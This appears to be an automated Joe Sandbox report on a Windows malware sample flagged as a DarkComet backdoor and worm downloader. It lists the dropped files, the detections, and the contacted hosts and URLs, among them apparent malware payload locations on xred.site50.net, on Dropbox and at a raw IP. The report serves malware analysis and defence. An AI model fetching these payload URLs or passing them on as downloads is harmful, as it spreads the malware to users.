RDTSC time measurements 39->87 file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe62%VirustotalBrowse
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe59%ReversingLabsWin32.Backdoor.DarkComet
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraTR/Dropper.Gen

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraTR/Dropper.Gen
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraTR/Dropper.Gen
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraTR/Dropper.Gen
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll3%MetadefenderBrowse
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll0%ReversingLabs

                                Unpacked PE Files

                                SourceDetectionScannerLabelLinkDownload
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                                9.0.Synaptics.exe.400000.4.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.4.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                12.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                12.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                6.0.uniformerede.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                                6.2.uniformerede.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                6.2.uniformerede.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.2.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.2.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                9.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                6.2.uniformerede.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                6.0.uniformerede.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                6.0.uniformerede.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                12.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                12.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.3.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.3.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.1.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.1.unpack100%AviraW2000M/Dldr.Agent.17651006Download File

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://xred.site50.net/syn/SSLLibrary.dlX0%Avira URL Cloudsafe
                                https://roaming.edog.0%URL Reputationsafe
                                https://cdn.entity.0%URL Reputationsafe
                                https://powerlift.acompli.net0%URL Reputationsafe
                                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                                https://cortana.ai0%URL Reputationsafe
                                https://api.aadrm.com/0%URL Reputationsafe
                                https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                                http://xred.site50.net/syn/SUpdate.iniZ0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SUpdate.ini3%VirustotalBrowse
                                http://xred.site50.net/syn/SUpdate.ini0%Avira URL Cloudsafe
                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                                https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                                https://store.office.cn/addinstemplate0%URL Reputationsafe
                                https://api.aadrm.com0%URL Reputationsafe
                                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                                https://www.odwebp.svc.ms0%URL Reputationsafe
                                http://xred.site50.net/syn/Synaptics.rar0%Avira URL Cloudsafe
                                https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                                https://dataservice.o365filtering.com/0%URL Reputationsafe
                                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                                https://ncus.contentsync.0%URL Reputationsafe
                                https://apis.live.net/v5.0/0%URL Reputationsafe
                                http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                https://wus2.contentsync.0%URL Reputationsafe
                                http://xred.site50.net/syn/Synaptics.rarZ0%Avira URL Cloudsafe
                                https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                                http://2.58.149.33/ominz_QLUnxlrvVz46.bin0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		172.217.168.14
                                  		truefalse
                                    		high
                                    xred.mooo.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high
                                        http://2.58.149.33/ominz_QLUnxlrvVz46.bintrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://api.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                          		high
                                          https://login.microsoftonline.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                            		high
                                            https://shell.suite.office.com:144376A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                              		high
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1RCXDA77.tmp.9.drfalse
                                                		high
                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                  		high
                                                  http://xred.site50.net/syn/SSLLibrary.dlXuniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://autodiscover-s.outlook.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                    		high
                                                    https://roaming.edog.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                      		high
                                                      https://cdn.entity.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.addins.omex.office.net/appinfo/query76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                        		high
                                                        https://clients.config.office.net/user/v1.0/tenantassociationkey76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            		high
                                                            https://powerlift.acompli.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://rpsticket.partnerservices.getmicrosoftkey.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://lookup.onenote.com/lookup/geolocation/v176A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                              		high
                                                              https://cortana.ai76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                		high
                                                                https://cloudfiles.onenote.com/upload.aspx76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                  		high
                                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                    		high
                                                                    https://entitlement.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                      		high
                                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        		high
                                                                        https://api.aadrm.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://ofcrecsvcapi-int.azurewebsites.net/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SUpdate.iniRCXDA77.tmp.9.drfalse
                                                                          • 3%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://api.microsoftstream.com/api/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                            		high
                                                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                              		high
                                                                              https://cr.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                		high
                                                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://portal.office.com/account/?ref=ClientMeControl76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                  		high
                                                                                  https://graph.ppe.windows.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    		high
                                                                                    https://res.getmicrosoftkey.com/api/redemptionevents76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://powerlift-frontdesk.acompli.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://tasks.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                      		high
                                                                                      https://officeci.azurewebsites.net/api/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                        		high
                                                                                        https://store.office.cn/addinstemplate76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://docs.google.com/drSynaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.aadrm.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                            		high
                                                                                            https://globaldisco.crm.dynamics.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                              		high
                                                                                              https://messaging.engagement.office.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                		high
                                                                                                https://docs.google.com/0Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                    		high
                                                                                                    https://dev0-api.acompli.net/autodetect76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.odwebp.svc.ms76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://xred.site50.net/syn/Synaptics.rarRCXDA77.tmp.9.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://api.diagnosticssdf.office.com/v2/feedback76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                        		high
                                                                                                        https://api.powerbi.com/v1.0/myorg/groups76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                          		high
                                                                                                          https://web.microsoftstream.com/video/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                            		high
                                                                                                            http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.drfalse
                                                                                                              		high
                                                                                                              https://api.addins.store.officeppe.com/addinstemplate76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://graph.windows.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                		high
                                                                                                                https://dataservice.o365filtering.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://officesetup.getmicrosoftkey.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://analysis.windows.net/powerbi/api76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  		high
                                                                                                                  https://prod-global-autodetect.acompli.net/autodetect76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                    		high
                                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCXDA77.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                        		high
                                                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                          		high
                                                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            		high
                                                                                                                            https://ncus.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                              		high
                                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                		high
                                                                                                                                http://weather.service.msn.com/data.aspx76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://apis.live.net/v5.0/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                    		high
                                                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                      		high
                                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllRCXDA77.tmp.9.drtrue
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                        		high
                                                                                                                                        https://management.azure.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.office365.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            		high
                                                                                                                                            https://wus2.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://incidents.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                              		high
                                                                                                                                              https://clients.config.office.net/user/v1.0/ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                		high
                                                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlluniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://api.office.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://incidents.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://asgsmsproxyapi.azurewebsites.net/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/android/policies76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://entitlement.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://substrate.office.com/search/api/v2/init76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://outlook.office.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://storage.live.com/clientlogs/uploadlocation76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://outlook.office365.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://webshell.suite.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://management.azure.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  172.217.168.14
                                                                                                                                                                                  		docs.google.comUnited States
                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                  69.42.215.252
                                                                                                                                                                                  		freedns.afraid.orgUnited States
                                                                                                                                                                                  		17048AWKNET-LLCUSfalse

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                  Analysis ID:634939
                                                                                                                                                                                  Start date and time: 27/05/202204:36:302022-05-27 04:36:30 +02:00
                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 11m 39s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Sample file name:SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@21/60@6/2
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                  • Successful, ratio: 99.4% (good quality ratio 97.1%)
                                                                                                                                                                                  • Quality average: 82.8%
                                                                                                                                                                                  • Quality standard deviation: 25%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 90%
                                                                                                                                                                                  • Number of executed functions: 210
                                                                                                                                                                                  • Number of non-executed functions: 292
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                  • Enable AMSI

                                                                                                                                                                                  Warnings

                                                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.24, 52.109.12.23, 13.89.179.12
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  04:37:46API Interceptor58x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  04:37:50API Interceptor1x Sleep call for process: ._cache_uniformerede.exe modified
